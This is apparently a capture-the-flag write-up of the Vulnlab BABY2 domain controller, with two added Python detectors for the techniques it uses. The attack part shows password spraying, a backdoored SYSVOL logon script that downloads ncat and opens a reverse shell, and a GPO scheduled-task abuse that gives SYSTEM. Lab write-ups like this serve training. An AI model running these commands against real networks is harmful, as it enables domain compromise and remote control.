Here is my note on the BABY2 box from Vulnlab.
BABY2: 10.10.81.76
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-31 14:59:03Z)
No AS-REP roasting.
sudo impacket-GetUserSPNs 'baby2.vl/Carl.Moore:Carl.Moore' -dc-ip 10.10.81.76 -request
No Kerberoasting.
135/tcp open msrpc Microsoft Windows RPC
┌──(root㉿kali)-[/home/…/BABY2/10.10.81.76/apps/dev]
└─# rpcclient 10.10.81.76 -U "guest%guest" -c "enumdomusers;quit"
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
┌──(root㉿kali)-[/home/…/BABY2/10.10.81.76/apps/dev]
└─# rpcclient 10.10.81.76 -U "guest%" -c "enumdomusers;quit"
result was NT_STATUS_ACCESS_DENIED
┌──(root㉿kali)-[/home/…/BABY2/10.10.81.76/apps/dev]
└─# rpcclient 10.10.81.76 -U "Guest%" -c "enumdomusers;quit"
result was NT_STATUS_ACCESS_DENIED
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby2.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.baby2.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.baby2.vl
| Not valid before: 2024-10-31T14:48:05
|_Not valid after: 2025-10-31T14:48:05
LDAP v3: anonymous bind = NOPE, needs a valid account.
ldapsearch -H ldap://10.10.81.76 -x -W -D "Carl.Moore@baby2.vl" -b "dc=baby2,dc=vl" '(objectClass=person)' - WORKS !
ldapsearch -H ldap://10.10.81.76 -x -W -D "Carl.Moore@baby2.vl" -b "dc=baby2,dc=vl" '(objectClass=person)' > ldap-people.txt
#No password disclosed in the LDAP attributes unfortunately.
445/tcp open microsoft-ds?
smbclient -N -L 10.10.81.76
Sharename  Type  Comment
---------  ----  -------
ADMIN$     Disk  Remote Admin
apps       Disk
C$         Disk  Default share
docs       Disk
homes      Disk
IPC$       IPC   Remote IPC
NETLOGON   Disk  Logon server share
SYSVOL     Disk  Logon server share
[+] IP: 10.10.81.76:445 Name: 10.10.81.76 Status: Authenticated
Disk      Permissions  Comment
----      -----------  -------
ADMIN$    NO ACCESS    Remote Admin
apps      READ ONLY                        #After homes.
C$        NO ACCESS    Default share
docs      NO ACCESS
homes     READ, WRITE                      #After IPC. Empty user directory = NOPE!
IPC$      READ ONLY    Remote IPC          #IPC users as usual.
NETLOGON  READ ONLY    Logon server share
SYSVOL    NO ACCESS    Logon server share
[*] Closed 1 connections
sudo lookupsid.py Guest@10.10.81.76 | tee usernames
grep SidTypeUser usernames | awk '{print $2}' | cut -d '\' -f2 > users.txt
┌──(root㉿kali)-[/home/…/VL/BABY2/10.10.81.76/apps]
└─# smbclient \\\\10.10.81.76\\apps -U "guest%"
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Sep 7 15:12:59 2023
.. D 0 Tue Aug 22 16:10:21 2023
dev D 0 Thu Sep 7 15:13:50 2023
6126847 blocks of size 4096. 2017040 blocks available
smb: \> mask ""
smb: \> recurse
smb: \> prompt
smb: \> mget *
getting file \dev\CHANGELOG of size 108 as dev/CHANGELOG (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \dev\login.vbs.lnk of size 1800 as dev/login.vbs.lnk (3.7 KiloBytes/sec) (average 2.0 KiloBytes/sec)
smb: \> exit
┌──(root㉿kali)-[/home/…/VL/BABY2/10.10.81.76/apps]
└─# tree -r .
.
└── dev
├── login.vbs.lnk
└── CHANGELOG
crackmapexec smb 10.10.81.76 -u users.txt -p users.txt --no-bruteforce --continue-on-success | grep '[+]'
SMB 10.10.81.76 445 DC [+] baby2.vl\Carl.Moore:Carl.Moore
SMB 10.10.81.76 445 DC [+] baby2.vl\library:library
crackmapexec smb 10.10.81.76 -u users.txt -p '' --no-bruteforce --continue-on-success | grep '[+]'
SMB 10.10.81.76 445 DC [+] baby2.vl\Guest:
CREDS DISCOVERED !
baby2.vl\Carl.Moore:Carl.Moore
baby2.vl\library:library
baby2.vl\Guest:
┌──(root㉿kali)-[/home/kali/VL/BABY2/10.10.81.76]
└─# crackmapexec smb 10.10.81.76 -u Carl.Moore -p Carl.Moore --shares
SMB 10.10.81.76 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB 10.10.81.76 445 DC [+] baby2.vl\Carl.Moore:Carl.Moore
SMB 10.10.81.76 445 DC [+] Enumerated shares
SMB 10.10.81.76 445 DC Share Permissions Remark
SMB 10.10.81.76 445 DC ----- ----------- ------
SMB 10.10.81.76 445 DC ADMIN$ Remote Admin
SMB 10.10.81.76 445 DC apps READ,WRITE
SMB 10.10.81.76 445 DC C$ Default share
SMB 10.10.81.76 445 DC docs READ,WRITE
SMB 10.10.81.76 445 DC homes READ,WRITE
SMB 10.10.81.76 445 DC IPC$ READ Remote IPC
SMB 10.10.81.76 445 DC NETLOGON READ Logon server share
SMB 10.10.81.76 445 DC SYSVOL READ Logon server share
┌──(root㉿kali)-[/home/kali/VL/BABY2/10.10.81.76]
└─# crackmapexec smb 10.10.81.76 -u library -p library --shares
SMB 10.10.81.76 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB 10.10.81.76 445 DC [+] baby2.vl\library:library
SMB 10.10.81.76 445 DC [+] Enumerated shares
SMB 10.10.81.76 445 DC Share Permissions Remark
SMB 10.10.81.76 445 DC ----- ----------- ------
SMB 10.10.81.76 445 DC ADMIN$ Remote Admin
SMB 10.10.81.76 445 DC apps READ,WRITE
SMB 10.10.81.76 445 DC C$ Default share
SMB 10.10.81.76 445 DC docs READ,WRITE #EMPTY.
SMB 10.10.81.76 445 DC homes READ,WRITE #EMPTY.
SMB 10.10.81.76 445 DC IPC$ READ Remote IPC #DONE
SMB 10.10.81.76 445 DC NETLOGON READ Logon server share #DON'T BOTHER.
SMB 10.10.81.76 445 DC SYSVOL READ Logon server share #DONE
Remember the homes share? Check out the Carl.Moore folder as the Carl.Moore user.
#Never mind, still empty as usual.
login.vbs.lnk points at the SYSVOL scripts folder, so let's check that out.
┌──(root㉿kali)-[/home/…/VL/BABY2/10.10.81.76/SYSVOL]
└─# smbclient \\\\10.10.81.76\\SYSVOL -U "Carl.Moore%Carl.Moore"
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Aug 22 13:37:36 2023
.. D 0 Tue Aug 22 13:37:36 2023
baby2.vl Dr 0 Tue Aug 22 13:37:36 2023
6126847 blocks of size 4096. 2016048 blocks available
smb: \> cd baby2.vl
smb: \baby2.vl\> dir
. D 0 Tue Aug 22 13:43:55 2023
.. D 0 Tue Aug 22 13:37:36 2023
DfsrPrivate DHSr 0 Tue Aug 22 13:43:55 2023
Policies D 0 Tue Aug 22 13:37:41 2023
scripts D 0 Tue Aug 22 15:28:27 2023
6126847 blocks of size 4096. 2016048 blocks available
smb: \baby2.vl\> cd scripts
smb: \baby2.vl\scripts\> dir
. D 0 Tue Aug 22 15:28:27 2023
.. D 0 Tue Aug 22 13:43:55 2023
login.vbs A 992 Sat Sep 2 10:55:51 2023
6126847 blocks of size 4096. 2016047 blocks available
smb: \baby2.vl\scripts\> get login.vbs
getting file \baby2.vl\scripts\login.vbs of size 992 as login.vbs (1.1 KiloBytes/sec) (average 1.1 KiloBytes/sec)
smb: \baby2.vl\scripts\> exit
login.vbs doesn't contain any credentials unfortunately.
No interesting scripts in SYSVOL other than login.vbs unfortunately.
.lnk? Looks like I have to guess some file types to gather hashes with Responder.
Well, almost: only one file type works, and that is the .vbs file.
Both Carl.Moore and library can modify login.vbs and upload it to the scripts folder of the SYSVOL share.
Looking back at CHANGELOG:
cat CHANGELOG
[0.2]
- Added automated drive mapping
[0.1]
- Rolled out initial version of the domain logon script
Basically, some user will read and execute this login.vbs file as a logon script, so we put the payload into it.
Set oShell = CreateObject("Wscript.Shell")
oShell.run "cmd.exe /c curl 10.8.0.136/nc64.exe -o C:\Windows\Temp\nc64.exe"
oShell.run "cmd.exe /c C:\Windows\Temp\nc64.exe 10.8.0.136 2222 -e cmd.exe"
Set oShell = CreateObject("Wscript.Shell")
oShell.run "cmd.exe /c curl 10.8.0.71/ncat.exe -o C:\Windows\Temp\ncat.exe"
oShell.run "cmd.exe /c C:\Windows\Temp\ncat.exe 10.8.0.71 1234 -e cmd.exe"
Put it in login.vbs:
Sub MapNetworkShare(sharePath, driveLetter)
Dim objNetwork
Set objNetwork = CreateObject("WScript.Network")
Set oShell = CreateObject("Wscript.Shell")
oShell.run "cmd.exe /c curl 10.8.0.71/ncat.exe -o C:\Windows\Temp\ncat.exe"
oShell.run "cmd.exe /c C:\Windows\Temp\ncat.exe 10.8.0.71 1234 -e cmd.exe"
' Check if the drive is already mapped
Dim mappedDrives
Set mappedDrives = objNetwork.EnumNetworkDrives
Dim isMapped
isMapped = False
For i = 0 To mappedDrives.Count - 1 Step 2
[SNIP]
https://sc.vern.cc/@arz101/vulnlab-baby2-a3159c0f705a
Then upload it to the scripts folder of the SYSVOL share and wait for the shell:
sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.81.76] 53963
Microsoft Windows [Version 10.0.20348.1906]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
baby2\amelia.griffiths
USER-SHELL !
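A defender's counterpart to the logon-script swap above, added here as an example (not from the note or from Vulnlab): Python that scans Security event 5145 (detailed file share access) records for write-intent access to SYSVOL logon scripts by anyone other than a trusted admin. The key=value log shape, the users and the access masks are constructed for the example; the share and script names follow the note.

```python
import re

# Access-mask bits that imply modification of a file share object:
# WriteData/AddFile, AppendData, DELETE, WRITE_DAC, WRITE_OWNER.
WRITE_INTENT = 0x2 | 0x4 | 0x10000 | 0x40000 | 0x80000
FIELD_RE = re.compile(r"(\w+)=(\S+)")

# Constructed sample: Security event 5145 flattened to key=value lines, the way a
# SIEM export might look. The users and masks are made up for this example.
SAMPLE_EVENTS = r"""
EventID=5145 SubjectDomainName=BABY2 SubjectUserName=Carl.Moore ShareName=\\*\SYSVOL RelativeTargetName=baby2.vl\scripts\login.vbs AccessMask=0x2
EventID=5145 SubjectDomainName=BABY2 SubjectUserName=amelia.griffiths ShareName=\\*\SYSVOL RelativeTargetName=baby2.vl\scripts\login.vbs AccessMask=0x1
EventID=5145 SubjectDomainName=BABY2 SubjectUserName=Administrator ShareName=\\*\SYSVOL RelativeTargetName=baby2.vl\scripts\login.vbs AccessMask=0x10000
EventID=5145 SubjectDomainName=BABY2 SubjectUserName=library ShareName=\\*\apps RelativeTargetName=dev\CHANGELOG AccessMask=0x2
EventID=4624 SubjectDomainName=BABY2 SubjectUserName=library LogonType=3
"""

def parse_event(line):
    """Split one key=value line into a dict; values carry no spaces in this shape."""
    return dict(FIELD_RE.findall(line))

def is_sysvol_script(share, target):
    """True for objects under the domain's scripts folder on the SYSVOL share."""
    return share.upper().endswith("\\SYSVOL") and "\\scripts\\" in target.lower()

def find_sysvol_script_writes(text, trusted_users=("Administrator",)):
    """Return (domain-qualified user, relative path, mask) for every write-intent
    access to a SYSVOL logon script by an account outside trusted_users."""
    hits = []
    for line in text.splitlines():
        ev = parse_event(line)
        if ev.get("EventID") != "5145":
            continue
        mask = int(ev.get("AccessMask", "0x0"), 16)
        if not (mask & WRITE_INTENT):
            continue  # plain read: a logon client fetching the script is expected
        if not is_sysvol_script(ev["ShareName"], ev["RelativeTargetName"]):
            continue
        if ev["SubjectUserName"] in trusted_users:
            continue
        hits.append((ev["SubjectDomainName"] + "\\" + ev["SubjectUserName"],
                     ev["RelativeTargetName"], ev["AccessMask"]))
    return hits

if __name__ == "__main__":
    for user, path, mask in find_sysvol_script_writes(SAMPLE_EVENTS):
        print(f"ALERT: {user} modified logon script {path} (AccessMask {mask})")
```

Only the Carl.Moore write to login.vbs is reported: the read by amelia.griffiths, the admin's delete and the write outside SYSVOL all pass.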
C:\>whoami
whoami
baby2\amelia.griffiths
C:\>hostname
hostname
dc
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is E6F3-2485
Directory of C:\
05/08/2021 01:20 AM <DIR> PerfLogs
08/27/2023 10:02 AM <DIR> Program Files
08/22/2023 10:30 AM <DIR> Program Files (x86)
08/22/2023 01:10 PM <DIR> shares
08/22/2023 12:35 PM <DIR> temp
08/22/2023 12:51 PM 36 user.txt
08/22/2023 12:54 PM <DIR> Users
08/27/2023 10:12 AM <DIR> Windows
1 File(s) 36 bytes
7 Dir(s) 8,248,766,464 bytes free
C:\>type user.txt
type user.txt
VL{REDIRECTED}
USER.TXT: VL{REDIRECTED}
PRIV ESC:
BloodHound Data:
amelia.griffiths -> Member of LEGACY group -> WriteDACL and WriteOwner -> GPOADM User:
Add-DomainObjectAcl -PrincipalIdentity amelia.griffiths -TargetIdentity GPOADM -Rights All
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity GPOADM -AccountPassword $UserPassword
crackmapexec smb 10.10.81.76 -u 'GPOADM' -p 'Password123!'
SMB 10.10.81.76 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB 10.10.81.76 445 DC [+] baby2.vl\GPOADM:Password123!
-WORKS !
GPOADM -> GenericAll -> Default Domain Policy -> GPLink -> BABY2.VL:
GPOABUSE !
┌──(root㉿kali)-[/home/kali/Kali-Tools/attacktive-directory-tools/pyGPOAbuse]
└─# python3 pygpoabuse.py 'baby2.vl'/'GPOADM':'Password123!' -gpo-id "31B2F340-016D-11D2-945F-00C04FB984F9"
SUCCESS:root:ScheduledTask TASK_41bee3dc created!
[+] ScheduledTask TASK_41bee3dc created!
gpupdate /force
┌──(root㉿kali)-[/home/kali/Kali-Tools/attacktive-directory-tools/pyGPOAbuse]
└─# python3 pygpoabuse.py 'baby2.vl'/'GPOADM':'Password123!' -gpo-id "31B2F340-016D-11D2-945F-00C04FB984F9" -dc-ip 10.10.81.76 -f -command "C:\Windows\Temp\ncat.exe -nv 10.8.0.71 4444 -e CMD"
SUCCESS:root:ScheduledTask TASK_ddde254c created!
[+] ScheduledTask TASK_ddde254c created!
Wait for shell:
sudo rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.81.76] 58481
Microsoft Windows [Version 10.0.20348.1906]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>hostname
hostname
dc
SYSTEM-SHELL !
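On the defensive side, as an added example that is not part of the note or of the pyGPOAbuse project: a parser for a GPO's ScheduledTasks.xml that flags Group Policy Preferences tasks of the ImmediateTaskV2 kind or running as SYSTEM, which is the artifact a scheduled-task injection into a GPO leaves in SYSVOL. The XML is constructed for the example and assumes the standard GPP element names (ImmediateTaskV2/TaskV2, Properties runAs, Exec with Command and Arguments); the task name follows the note.

```python
import xml.etree.ElementTree as ET

# Constructed sample of a Group Policy Preferences ScheduledTasks.xml (it lives under
# <GPO GUID>\Machine\Preferences\ScheduledTasks\ in SYSVOL). The task name follows
# the BABY2 note; the second, benign task is made up for this example.
SAMPLE_SCHEDULED_TASKS_XML = r"""<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
  <ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}" name="TASK_ddde254c">
    <Properties action="C" name="TASK_ddde254c" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3">
        <Actions Context="Author"><Exec><Command>cmd.exe</Command>
          <Arguments>/c C:\Windows\Temp\ncat.exe -nv 10.8.0.71 4444 -e CMD</Arguments></Exec></Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
  <TaskV2 clsid="{D8896631-B747-47a7-84A6-C155337F3BC8}" name="Inventory">
    <Properties action="U" name="Inventory" runAs="BABY2\svc_inventory" logonType="Password">
      <Task version="1.3">
        <Actions Context="Author"><Exec><Command>C:\Tools\inventory.exe</Command><Arguments>/quiet</Arguments></Exec></Actions>
      </Task>
    </Properties>
  </TaskV2>
</ScheduledTasks>
"""

def local(tag):
    """Strip an XML namespace prefix so tags compare by local name."""
    return tag.rsplit("}", 1)[-1]

def find_suspicious_gpp_tasks(xml_text):
    """Return (kind, name, runAs, command line) for each GPP task that fires
    immediately (ImmediateTaskV2) or runs as SYSTEM, the shape an injected task
    takes. A password-based service task is left alone."""
    findings = []
    for task in ET.fromstring(xml_text):
        props = next((c for c in task if local(c.tag) == "Properties"), None)
        if props is None:
            continue
        run_as = props.get("runAs", "")
        cmdline = ""
        for el in props.iter():
            if local(el.tag) == "Exec":  # collect the action's Command + Arguments
                parts = {local(c.tag): (c.text or "").strip() for c in el}
                cmdline = f"{parts.get('Command', '')} {parts.get('Arguments', '')}".strip()
        kind = local(task.tag)
        if kind == "ImmediateTaskV2" or "SYSTEM" in run_as.upper():
            findings.append((kind, props.get("name", task.get("name", "")), run_as, cmdline))
    return findings
```

Running this over every Policies\{GUID}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml in SYSVOL, and diffing against a known-good copy, surfaces a freshly injected task before the next gpupdate applies it.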
C:\Users\Administrator\Desktop>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop>hostname
hostname
dc
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is E6F3-2485
Directory of C:\Users\Administrator\Desktop
08/22/2023 12:50 PM <DIR> .
08/22/2023 10:08 AM <DIR> ..
08/22/2023 12:51 PM 36 root.txt
1 File(s) 36 bytes
2 Dir(s) 8,233,865,216 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: baby2.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.baby2.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.baby2.vl
| Not valid before: 2024-10-31T14:48:05
|_Not valid after: 2025-10-31T14:48:05
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby2.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.baby2.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.baby2.vl
| Not valid before: 2024-10-31T14:48:05
|_Not valid after: 2025-10-31T14:48:05
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: baby2.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.baby2.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.baby2.vl
| Not valid before: 2024-10-31T14:48:05
|_Not valid after: 2025-10-31T14:48:05
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-10-31T15:00:25+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=dc.baby2.vl
| Not valid before: 2024-10-30T14:56:54
|_Not valid after: 2025-05-01T14:56:54
| rdp-ntlm-info:
| Target_Name: BABY2
| NetBIOS_Domain_Name: BABY2
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: baby2.vl
| DNS_Computer_Name: dc.baby2.vl
| DNS_Tree_Name: baby2.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-10-31T14:59:45+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
51867/tcp open msrpc Microsoft Windows RPC
51889/tcp open msrpc Microsoft Windows RPC
53225/tcp open msrpc Microsoft Windows RPC
53232/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -2s
| smb2-time:
| date: 2024-10-31T14:59:48
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required